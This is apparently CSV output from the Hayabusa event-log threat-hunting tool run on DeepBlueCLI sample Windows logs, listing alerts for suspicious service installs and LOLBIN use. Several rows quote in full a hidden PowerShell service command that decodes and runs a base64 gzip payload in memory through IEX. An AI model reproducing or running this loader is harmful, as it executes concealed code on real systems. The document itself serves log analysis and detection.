""C:\Windows\system32\PING.EXE"" ""Local CMOS Clock"" /n 2 | Path: C:\Windows\System32\PING.EXE | PID: 0xfb0 | User: IEUser | LID: 0x6590f",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 02:43:49.912 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\PING.EXE"" time.windows.com /n 2 | Path: C:\Windows\System32\PING.EXE | PID: 0x184 | User: IEUser | LID: 0x6590f",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 05:36:09.147 +09:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,"Svc: zIGuwymOgHZnXZPm | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADhM4FcCA7VWbW/aSBD+nEr9D1aFhK0QbAhtmkiVbm1ew0sABwhQVG3stVlYex17zVuv//3GgBt6Te7ak85KxK5nZvfZZ57ZsRP7lqDcl4K7JpK+vn1z1sUh9iQ54w7q7PbLIidl1p62iJWzMzBm5pVF8XZXiQfSJ0meoiAocw9Tf3ZzY8RhSHxxmOdrRKAoIt4joySSFelPaTQnIbm4e1wQS0hfpcyXfI3xR8yOblsDW3MiXSDfTmwtbuEEV94MGBVy9vPnrDK9KMzylacYs0jOmttIEC9vM5ZVpG9KsuH9NiBytk2tkEfcEfkR9S+L+YEfYYd0YLUVaRMx53aUVeAo8BcSEYe+9HyoZJWDj5yFYTfkFrLtkEQQkm/4K74kcsaPGctJf8jTI4R+7AvqEbALEvLAJOGKWiTK17FvM9InzkzukHV68l8Nkk+DwKsrQiUHaXkNa5vbMSOH8KzyM9o0nwo833MKPHx7++btGydVAQ4871QFMDqb7scEcMpdHtG93ydJy0lt2AwLHm5hmrkPY6LMpGmShOlsJmWCUjv3engh9QVPYneDDbybDjm1ZxBzTE/maT4ePyyjxPS60srEoT4pb33sUSsVk/wS5cRhZH/MfOrWAWBy9mggdpkw4mKR8JeTpj+HVTwqvsfqMWU2CZEFaYsAFWRU+RHMISVytuG3iQc0HeZZYN8BCZPU+yjbbbp7MgenrMFwFOWkbgw1ZOUkk2BG7JyE/IgeTSgWfD/MPsNtx0xQC0ciXW6mnFB53NLgfiTC2ILkwfHvzYBYFLOEjZxUpzbRtyZ1062zL3JhYMao78JKK8gFvEk4MEUiiRBQJulX8iYRDS9gxAOXfTlXGXaheI/q30sIu8TOvoAx1fZByAkhKRMnCCHLJuMiJw1pKOBiSMjdy+k/ITi5ElIsRkiOKZHTYpnqW5FIPLPQ2h+HYb9hrC4TiR452jMSCmCjGnJPxxH5UDJFCFzJ79Q7aiB4xg2ftS19SQtoTQuNNvwP6GWDl6/s5u2iroblzdxBjajRrnfLvXq9tLo1hyVhVhqi2W2IduVhsTBRvT8Yi0kD1e+pthyXdsEt3ZktZI836oedvltr+ma3cG1nXHYc98ox+4X3VdoaGT1dK+JWuRK3Rvpa10pRha7rPTroLW+r4nE8ZHjgqO5D4RrTTStcDAu8vWsgVJtfWrtbZ1ibt+3tuK5ej0pLVEHI8CvDqs6bYz1EXXWI3SFfNxc1NnINpI/OKZn0BlW916vqaFBbPJWvVRdiH/BcHw2LdBI89OcwrwKEpqqVGjbZ8XEPSKpxhN0++LhG0Zo74FM+R/p5h0dFvNQ50sGnOnkCXOOg2mVgvx8UORqyzgNGrcm2qqqFcbeE6hod1VyULIldvYdRtCrvymphaHN79L4zdtThA7tSy8Z9YDmqqq7r5aY1KWw+3l2VdO3J8KjHHou2ej34qPvrpttduXZvdNXfdLaPsN9AVYfvEvWAfDIu89Zm9f7uy3ZyIonXLvs2DqM5ZiAVuMDTeq3ysHq8jrucJhGyvG/OSxL6hEFHg56X6h0xxq2kL+wvbuhJh04xg5IdwPCy+OJIkb47Ks+tIn11czMBlFBAJ/rOt4jvinlO21xqGlz92qakwZl//YAGD7by6Yq5pIOc8vW3Ddl+QyUpuExgfcBGfL34fyk9lvocfux/o/T53T9Yf4lmLfcDCT9Zf3zxW5z/NgMjTAV4mnBXMXJoni8TcZTRyWdGmiJQiHN8ko++u1hcdOAL5C8TptLHZwoAAA==''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 05:36:09.147 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,"Svc: zIGuwymOgHZnXZPm | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADhM4FcCA7VWbW/aSBD+nEr9D1aFhK0QbAhtmkiVbm1ew0sABwhQVG3stVlYex17zVuv//3GgBt6Te7ak85KxK5nZvfZZ57ZsRP7lqDcl4K7JpK+vn1z1sUh9iQ54w7q7PbLIidl1p62iJWzMzBm5pVF8XZXiQfSJ0meoiAocw9Tf3ZzY8RhSHxxmOdrRKAoIt4joySSFelPaTQnIbm4e1wQS0hfpcyXfI3xR8yOblsDW3MiXSDfTmwtbuEEV94MGBVy9vPnrDK9KMzylacYs0jOmttIEC9vM5ZVpG9KsuH9NiBytk2tkEfcEfkR9S+L+YEfYYd0YLUVaRMx53aUVeAo8BcSEYe+9HyoZJWDj5yFYTfkFrLtkEQQkm/4K74kcsaPGctJf8jTI4R+7AvqEbALEvLAJOGKWiTK17FvM9InzkzukHV68l8Nkk+DwKsrQiUHaXkNa5vbMSOH8KzyM9o0nwo833MKPHx7++btGydVAQ4871QFMDqb7scEcMpdHtG93ydJy0lt2AwLHm5hmrkPY6LMpGmShOlsJmWCUjv3engh9QVPYneDDbybDjm1ZxBzTE/maT4ePyyjxPS60srEoT4pb33sUSsVk/wS5cRhZH/MfOrWAWBy9mggdpkw4mKR8JeTpj+HVTwqvsfqMWU2CZEFaYsAFWRU+RHMISVytuG3iQc0HeZZYN8BCZPU+yjbbbp7MgenrMFwFOWkbgw1ZOUkk2BG7JyE/IgeTSgWfD/MPsNtx0xQC0ciXW6mnFB53NLgfiTC2ILkwfHvzYBYFLOEjZxUpzbRtyZ1062zL3JhYMao78JKK8gFvEk4MEUiiRBQJulX8iYRDS9gxAOXfTlXGXaheI/q30sIu8TOvoAx1fZByAkhKRMnCCHLJuMiJw1pKOBiSMjdy+k/ITi5ElIsRkiOKZHTYpnqW5FIPLPQ2h+HYb9hrC4TiR452jMSCmCjGnJPxxH5UDJFCFzJ79Q7aiB4xg2ftS19SQtoTQuNNvwP6GWDl6/s5u2iroblzdxBjajRrnfLvXq9tLo1hyVhVhqi2W2IduVhsTBRvT8Yi0kD1e+pthyXdsEt3ZktZI836oedvltr+ma3cG1nXHYc98ox+4X3VdoaGT1dK+JWuRK3Rvpa10pRha7rPTroLW+r4nE8ZHjgqO5D4RrTTStcDAu8vWsgVJtfWrtbZ1ibt+3tuK5ej0pLVEHI8CvDqs6bYz1EXXWI3SFfNxc1NnINpI/OKZn0BlW916vqaFBbPJWvVRdiH/BcHw2LdBI89OcwrwKEpqqVGjbZ8XEPSKpxhN0++LhG0Zo74FM+R/p5h0dFvNQ50sGnOnkCXOOg2mVgvx8UORqyzgNGrcm2qqqFcbeE6hod1VyULIldvYdRtCrvymphaHN79L4zdtThA7tSy8Z9YDmqqq7r5aY1KWw+3l2VdO3J8KjHHou2ej34qPvrpttduXZvdNXfdLaPsN9AVYfvEvWAfDIu89Zm9f7uy3ZyIonXLvs2DqM5ZiAVuMDTeq3ysHq8jrucJhGyvG/OSxL6hEFHg56X6h0xxq2kL+wvbuhJh04xg5IdwPCy+OJIkb47Ks+tIn11czMBlFBAJ/rOt4jvinlO21xqGlz92qakwZl//YAGD7by6Yq5pIOc8vW3Ddl+QyUpuExgfcBGfL34fyk9lvocfux/o/T53T9Yf4lmLfcDCT9Zf3zxW5z/NgMjTAV4mnBXMXJoni8TcZTRyWdGmiJQiHN8ko++u1hcdOAL5C8TptLHZwoAAA==''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 05:36:09.147 +09:00,IE10Win7,7045,info,Persis,Service Installed,"Name: zIGuwymOgHZnXZPm | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADhM4FcCA7VWbW/aSBD+nEr9D1aFhK0QbAhtmkiVbm1ew0sABwhQVG3stVlYex17zVuv//3GgBt6Te7ak85KxK5nZvfZZ57ZsRP7lqDcl4K7JpK+vn1z1sUh9iQ54w7q7PbLIidl1p62iJWzMzBm5pVF8XZXiQfSJ0meoiAocw9Tf3ZzY8RhSHxxmOdrRKAoIt4joySSFelPaTQnIbm4e1wQS0hfpcyXfI3xR8yOblsDW3MiXSDfTmwtbuEEV94MGBVy9vPnrDK9KMzylacYs0jOmttIEC9vM5ZVpG9KsuH9NiBytk2tkEfcEfkR9S+L+YEfYYd0YLUVaRMx53aUVeAo8BcSEYe+9HyoZJWDj5yFYTfkFrLtkEQQkm/4K74kcsaPGctJf8jTI4R+7AvqEbALEvLAJOGKWiTK17FvM9InzkzukHV68l8Nkk+DwKsrQiUHaXkNa5vbMSOH8KzyM9o0nwo833MKPHx7++btGydVAQ4871QFMDqb7scEcMpdHtG93ydJy0lt2AwLHm5hmrkPY6LMpGmShOlsJmWCUjv3engh9QVPYneDDbybDjm1ZxBzTE/maT4ePyyjxPS60srEoT4pb33sUSsVk/wS5cRhZH/MfOrWAWBy9mggdpkw4mKR8JeTpj+HVTwqvsfqMWU2CZEFaYsAFWRU+RHMISVytuG3iQc0HeZZYN8BCZPU+yjbbbp7MgenrMFwFOWkbgw1ZOUkk2BG7JyE/IgeTSgWfD/MPsNtx0xQC0ciXW6mnFB53NLgfiTC2ILkwfHvzYBYFLOEjZxUpzbRtyZ1062zL3JhYMao78JKK8gFvEk4MEUiiRBQJulX8iYRDS9gxAOXfTlXGXaheI/q30sIu8TOvoAx1fZByAkhKRMnCCHLJuMiJw1pKOBiSMjdy+k/ITi5ElIsRkiOKZHTYpnqW5FIPLPQ2h+HYb9hrC4TiR452jMSCmCjGnJPxxH5UDJFCFzJ79Q7aiB4xg2ftS19SQtoTQuNNvwP6GWDl6/s5u2iroblzdxBjajRrnfLvXq9tLo1hyVhVhqi2W2IduVhsTBRvT8Yi0kD1e+pthyXdsEt3ZktZI836oedvltr+ma3cG1nXHYc98ox+4X3VdoaGT1dK+JWuRK3Rvpa10pRha7rPTroLW+r4nE8ZHjgqO5D4RrTTStcDAu8vWsgVJtfWrtbZ1ibt+3tuK5ej0pLVEHI8CvDqs6bYz1EXXWI3SFfNxc1NnINpI/OKZn0BlW916vqaFBbPJWvVRdiH/BcHw2LdBI89OcwrwKEpqqVGjbZ8XEPSKpxhN0++LhG0Zo74FM+R/p5h0dFvNQ50sGnOnkCXOOg2mVgvx8UORqyzgNGrcm2qqqFcbeE6hod1VyULIldvYdRtCrvymphaHN79L4zdtThA7tSy8Z9YDmqqq7r5aY1KWw+3l2VdO3J8KjHHou2ej34qPvrpttduXZvdNXfdLaPsN9AVYfvEvWAfDIu89Zm9f7uy3ZyIonXLvs2DqM5ZiAVuMDTeq3ysHq8jrucJhGyvG/OSxL6hEFHg56X6h0xxq2kL+wvbuhJh04xg5IdwPCy+OJIkb47Ks+tIn11czMBlFBAJ/rOt4jvinlO21xqGlz92qakwZl//YAGD7by6Yq5pIOc8vW3Ddl+QyUpuExgfcBGfL34fyk9lvocfux/o/T53T9Yf4lmLfcDCT9Zf3zxW5z/NgMjTAV4mnBXMXJoni8TcZTRyWdGmiJQiHN8ko++u1hcdOAL5C8TptLHZwoAAA==''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 05:36:09.237 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADhM4FcCA7VWbW/aSBD+nEr9D1aFhK0QbAhtmkiVbm1ew0sABwhQVG3stVlYex17zVuv//3GgBt6Te7ak85KxK5nZvfZZ57ZsRP7lqDcl4K7JpK+vn1z1sUh9iQ54w7q7PbLIidl1p62iJWzMzBm5pVF8XZXiQfSJ0meoiAocw9Tf3ZzY8RhSHxxmOdrRKAoIt4joySSFelPaTQnIbm4e1wQS0hfpcyXfI3xR8yOblsDW3MiXSDfTmwtbuEEV94MGBVy9vPnrDK9KMzylacYs0jOmttIEC9vM5ZVpG9KsuH9NiBytk2tkEfcEfkR9S+L+YEfYYd0YLUVaRMx53aUVeAo8BcSEYe+9HyoZJWDj5yFYTfkFrLtkEQQkm/4K74kcsaPGctJf8jTI4R+7AvqEbALEvLAJOGKWiTK17FvM9InzkzukHV68l8Nkk+DwKsrQiUHaXkNa5vbMSOH8KzyM9o0nwo833MKPHx7++btGydVAQ4871QFMDqb7scEcMpdHtG93ydJy0lt2AwLHm5hmrkPY6LMpGmShOlsJmWCUjv3engh9QVPYneDDbybDjm1ZxBzTE/maT4ePyyjxPS60srEoT4pb33sUSsVk/wS5cRhZH/MfOrWAWBy9mggdpkw4mKR8JeTpj+HVTwqvsfqMWU2CZEFaYsAFWRU+RHMISVytuG3iQc0HeZZYN8BCZPU+yjbbbp7MgenrMFwFOWkbgw1ZOUkk2BG7JyE/IgeTSgWfD/MPsNtx0xQC0ciXW6mnFB53NLgfiTC2ILkwfHvzYBYFLOEjZxUpzbRtyZ1062zL3JhYMao78JKK8gFvEk4MEUiiRBQJulX8iYRDS9gxAOXfTlXGXaheI/q30sIu8TOvoAx1fZByAkhKRMnCCHLJuMiJw1pKOBiSMjdy+k/ITi5ElIsRkiOKZHTYpnqW5FIPLPQ2h+HYb9hrC4TiR452jMSCmCjGnJPxxH5UDJFCFzJ79Q7aiB4xg2ftS19SQtoTQuNNvwP6GWDl6/s5u2iroblzdxBjajRrnfLvXq9tLo1hyVhVhqi2W2IduVhsTBRvT8Yi0kD1e+pthyXdsEt3ZktZI836oedvltr+ma3cG1nXHYc98ox+4X3VdoaGT1dK+JWuRK3Rvpa10pRha7rPTroLW+r4nE8ZHjgqO5D4RrTTStcDAu8vWsgVJtfWrtbZ1ibt+3tuK5ej0pLVEHI8CvDqs6bYz1EXXWI3SFfNxc1NnINpI/OKZn0BlW916vqaFBbPJWvVRdiH/BcHw2LdBI89OcwrwKEpqqVGjbZ8XEPSKpxhN0++LhG0Zo74FM+R/p5h0dFvNQ50sGnOnkCXOOg2mVgvx8UORqyzgNGrcm2qqqFcbeE6hod1VyULIldvYdRtCrvymphaHN79L4zdtThA7tSy8Z9YDmqqq7r5aY1KWw+3l2VdO3J8KjHHou2ej34qPvrpttduXZvdNXfdLaPsN9AVYfvEvWAfDIu89Zm9f7uy3ZyIonXLvs2DqM5ZiAVuMDTeq3ysHq8jrucJhGyvG/OSxL6hEFHg56X6h0xxq2kL+wvbuhJh04xg5IdwPCy+OJIkb47Ks+tIn11czMBlFBAJ/rOt4jvinlO21xqGlz92qakwZl//YAGD7by6Yq5pIOc8vW3Ddl+QyUpuExgfcBGfL34fyk9lvocfux/o/T53T9Yf4lmLfcDCT9Zf3zxW5z/NgMjTAV4mnBXMXJoni8TcZTRyWdGmiJQiHN8ko++u1hcdOAL5C8TptLHZwoAAA==''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\cmd.exe | PID: 0x108 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 05:36:09.334 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADhM4FcCA7VWbW/aSBD+nEr9D1aFhK0QbAhtmkiVbm1ew0sABwhQVG3stVlYex17zVuv//3GgBt6Te7ak85KxK5nZvfZZ57ZsRP7lqDcl4K7JpK+vn1z1sUh9iQ54w7q7PbLIidl1p62iJWzMzBm5pVF8XZXiQfSJ0meoiAocw9Tf3ZzY8RhSHxxmOdrRKAoIt4joySSFelPaTQnIbm4e1wQS0hfpcyXfI3xR8yOblsDW3MiXSDfTmwtbuEEV94MGBVy9vPnrDK9KMzylacYs0jOmttIEC9vM5ZVpG9KsuH9NiBytk2tkEfcEfkR9S+L+YEfYYd0YLUVaRMx53aUVeAo8BcSEYe+9HyoZJWDj5yFYTfkFrLtkEQQkm/4K74kcsaPGctJf8jTI4R+7AvqEbALEvLAJOGKWiTK17FvM9InzkzukHV68l8Nkk+DwKsrQiUHaXkNa5vbMSOH8KzyM9o0nwo833MKPHx7++btGydVAQ4871QFMDqb7scEcMpdHtG93ydJy0lt2AwLHm5hmrkPY6LMpGmShOlsJmWCUjv3engh9QVPYneDDbybDjm1ZxBzTE/maT4ePyyjxPS60srEoT4pb33sUSsVk/wS5cRhZH/MfOrWAWBy9mggdpkw4mKR8JeTpj+HVTwqvsfqMWU2CZEFaYsAFWRU+RHMISVytuG3iQc0HeZZYN8BCZPU+yjbbbp7MgenrMFwFOWkbgw1ZOUkk2BG7JyE/IgeTSgWfD/MPsNtx0xQC0ciXW6mnFB53NLgfiTC2ILkwfHvzYBYFLOEjZxUpzbRtyZ1062zL3JhYMao78JKK8gFvEk4MEUiiRBQJulX8iYRDS9gxAOXfTlXGXaheI/q30sIu8TOvoAx1fZByAkhKRMnCCHLJuMiJw1pKOBiSMjdy+k/ITi5ElIsRkiOKZHTYpnqW5FIPLPQ2h+HYb9hrC4TiR452jMSCmCjGnJPxxH5UDJFCFzJ79Q7aiB4xg2ftS19SQtoTQuNNvwP6GWDl6/s5u2iroblzdxBjajRrnfLvXq9tLo1hyVhVhqi2W2IduVhsTBRvT8Yi0kD1e+pthyXdsEt3ZktZI836oedvltr+ma3cG1nXHYc98ox+4X3VdoaGT1dK+JWuRK3Rvpa10pRha7rPTroLW+r4nE8ZHjgqO5D4RrTTStcDAu8vWsgVJtfWrtbZ1ibt+3tuK5ej0pLVEHI8CvDqs6bYz1EXXWI3SFfNxc1NnINpI/OKZn0BlW916vqaFBbPJWvVRdiH/BcHw2LdBI89OcwrwKEpqqVGjbZ8XEPSKpxhN0++LhG0Zo74FM+R/p5h0dFvNQ50sGnOnkCXOOg2mVgvx8UORqyzgNGrcm2qqqFcbeE6hod1VyULIldvYdRtCrvymphaHN79L4zdtThA7tSy8Z9YDmqqq7r5aY1KWw+3l2VdO3J8KjHHou2ej34qPvrpttduXZvdNXfdLaPsN9AVYfvEvWAfDIu89Zm9f7uy3ZyIonXLvs2DqM5ZiAVuMDTeq3ysHq8jrucJhGyvG/OSxL6hEFHg56X6h0xxq2kL+wvbuhJh04xg5IdwPCy+OJIkb47Ks+tIn11czMBlFBAJ/rOt4jvinlO21xqGlz92qakwZl//YAGD7by6Yq5pIOc8vW3Ddl+QyUpuExgfcBGfL34fyk9lvocfux/o/T53T9Yf4lmLfcDCT9Zf3zxW5z/NgMjTAV4mnBXMXJoni8TcZTRyWdGmiJQiHN8ko++u1hcdOAL5C8TptLHZwoAAA==''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd94 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 05:36:10.592 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""powershell.exe"" -nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIADhM4FcCA7VWbW/aSBD+nEr9D1aFhK0QbAhtmkiVbm1ew0sABwhQVG3stVlYex17zVuv//3GgBt6Te7ak85KxK5nZvfZZ57ZsRP7lqDcl4K7JpK+vn1z1sUh9iQ54w7q7PbLIidl1p62iJWzMzBm5pVF8XZXiQfSJ0meoiAocw9Tf3ZzY8RhSHxxmOdrRKAoIt4joySSFelPaTQnIbm4e1wQS0hfpcyXfI3xR8yOblsDW3MiXSDfTmwtbuEEV94MGBVy9vPnrDK9KMzylacYs0jOmttIEC9vM5ZVpG9KsuH9NiBytk2tkEfcEfkR9S+L+YEfYYd0YLUVaRMx53aUVeAo8BcSEYe+9HyoZJWDj5yFYTfkFrLtkEQQkm/4K74kcsaPGctJf8jTI4R+7AvqEbALEvLAJOGKWiTK17FvM9InzkzukHV68l8Nkk+DwKsrQiUHaXkNa5vbMSOH8KzyM9o0nwo833MKPHx7++btGydVAQ4871QFMDqb7scEcMpdHtG93ydJy0lt2AwLHm5hmrkPY6LMpGmShOlsJmWCUjv3engh9QVPYneDDbybDjm1ZxBzTE/maT4ePyyjxPS60srEoT4pb33sUSsVk/wS5cRhZH/MfOrWAWBy9mggdpkw4mKR8JeTpj+HVTwqvsfqMWU2CZEFaYsAFWRU+RHMISVytuG3iQc0HeZZYN8BCZPU+yjbbbp7MgenrMFwFOWkbgw1ZOUkk2BG7JyE/IgeTSgWfD/MPsNtx0xQC0ciXW6mnFB53NLgfiTC2ILkwfHvzYBYFLOEjZxUpzbRtyZ1062zL3JhYMao78JKK8gFvEk4MEUiiRBQJulX8iYRDS9gxAOXfTlXGXaheI/q30sIu8TOvoAx1fZByAkhKRMnCCHLJuMiJw1pKOBiSMjdy+k/ITi5ElIsRkiOKZHTYpnqW5FIPLPQ2h+HYb9hrC4TiR452jMSCmCjGnJPxxH5UDJFCFzJ79Q7aiB4xg2ftS19SQtoTQuNNvwP6GWDl6/s5u2iroblzdxBjajRrnfLvXq9tLo1hyVhVhqi2W2IduVhsTBRvT8Yi0kD1e+pthyXdsEt3ZktZI836oedvltr+ma3cG1nXHYc98ox+4X3VdoaGT1dK+JWuRK3Rvpa10pRha7rPTroLW+r4nE8ZHjgqO5D4RrTTStcDAu8vWsgVJtfWrtbZ1ibt+3tuK5ej0pLVEHI8CvDqs6bYz1EXXWI3SFfNxc1NnINpI/OKZn0BlW916vqaFBbPJWvVRdiH/BcHw2LdBI89OcwrwKEpqqVGjbZ8XEPSKpxhN0++LhG0Zo74FM+R/p5h0dFvNQ50sGnOnkCXOOg2mVgvx8UORqyzgNGrcm2qqqFcbeE6hod1VyULIldvYdRtCrvymphaHN79L4zdtThA7tSy8Z9YDmqqq7r5aY1KWw+3l2VdO3J8KjHHou2ej34qPvrpttduXZvdNXfdLaPsN9AVYfvEvWAfDIu89Zm9f7uy3ZyIonXLvs2DqM5ZiAVuMDTeq3ysHq8jrucJhGyvG/OSxL6hEFHg56X6h0xxq2kL+wvbuhJh04xg5IdwPCy+OJIkb47Ks+tIn11czMBlFBAJ/rOt4jvinlO21xqGlz92qakwZl//YAGD7by6Yq5pIOc8vW3Ddl+QyUpuExgfcBGfL34fyk9lvocfux/o/T53T9Yf4lmLfcDCT9Zf3zxW5z/NgMjTAV4mnBXMXJoni8TcZTRyWdGmiJQiHN8ko++u1hcdOAL5C8TptLHZwoAAA=='));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd(); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc10 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 05:38:04.034 +09:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,"Svc: DrzkXznQhkKgYssd | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAKtM4FcCA71WbW/aSBD+3Er9D1aFhK0SDIQmTaRKt8YYCC8BHMxb0Wljr+2FxUvsdXjp9b/fGHBCrs0p1w9nJWLXM7P77DPP7NiNA1tQHkjr7Xy3qDfHSPr+4f27Lg7xUpIzD3VrxLSclFkX726swVp59w6sGda0R60/g60ufZXkKVqtdL7ENJhdX1fiMCSBOMzzNSJQFJHlPaMkkhXpL2nok5Cc3d7PiS2k71Lmz3yN8XvMjm7bCrZ9Ip2hwElsLW7jBF3eXDEq5Oy3b1llelac5asPMWaRnDW3kSDLvMNYVpF+KMmGd9sVkbNtaoc84q7ID2lwXsoPggi7pAOrPZI2ET53oqwCR4G/kIg4DKTnQyWrHHzkLAy7IbeR44QkgpB8I3jkCyJngpixnPSHPD1C6MeBoEsCdkFCvjJJ+EhtEuXrOHAY6RN3JnfIOj35W4Pk0yDw6opQyUFeXsPa5k7MyCE8q/yM9phQBZ6TpAIRPz68//DeTcUQ+3HR76L+qRZg9G66HxMAK3d5RPe+X6VCTmrDjljwcAvTzF0YE2UmTZNMTGczKYMnZu718GLqC56udlmDV1OLU2cGIccUZSK/tlt8CTbuTTUxv644nbg0IPo2wEtqp6KSf0U9cRnZnzafunUAm5w9GoijE0Y8LBIec9L057DqkoqnWC2mzCEhsiF9EaCCzCovwRxSI2cbQZssganDPAtpcEHKJPU+yneb7p7MwSlbYTiKclI3hlqyc5JJMCNOTkJBRI8mFAu+H2af4bZjJqiNI5EuN1P+Qedx2woPIhHGNuQQKLgzV8SmmCWM5KQ6dYi2NamXbp/9JR8VzBgNPFjpEfIBbxIeTJEoIwSkiQqUvElEY7liZAku+9I2GPagkI+VsFcS9oiTfQVnqvWDsBNiUkZOUEK2TcZFTrJoKOCi2JMMyvotECc3xCmcSkiO2ZHT8plqW5EIPvNwEbkjY3PbTbR6JGpPSyiAEiPkSw1H5KJsihAIkz+qt7SC4Bk3Ata2tQUtojUtNtrwP6DnDa5fOs2beV0N9Y3vokbUaNe7eq9eLz/emFZZmNWGaHYbol0dzecmqvcHYzFpoPodLSzG5d3qhu7MFnLGG/Vip+3WBW2zm3uOO9Zd17t0zX7xs0Fbw0pPK5RwS6/GraG21grlqErX9R4d9BY3hrgfWwwPXNUbFa8w3bTCuVXk7V0DoZp/bu9uXKvmt53tuK5eDcsLVEWoElQtQ+PNsRairmphz+Lr5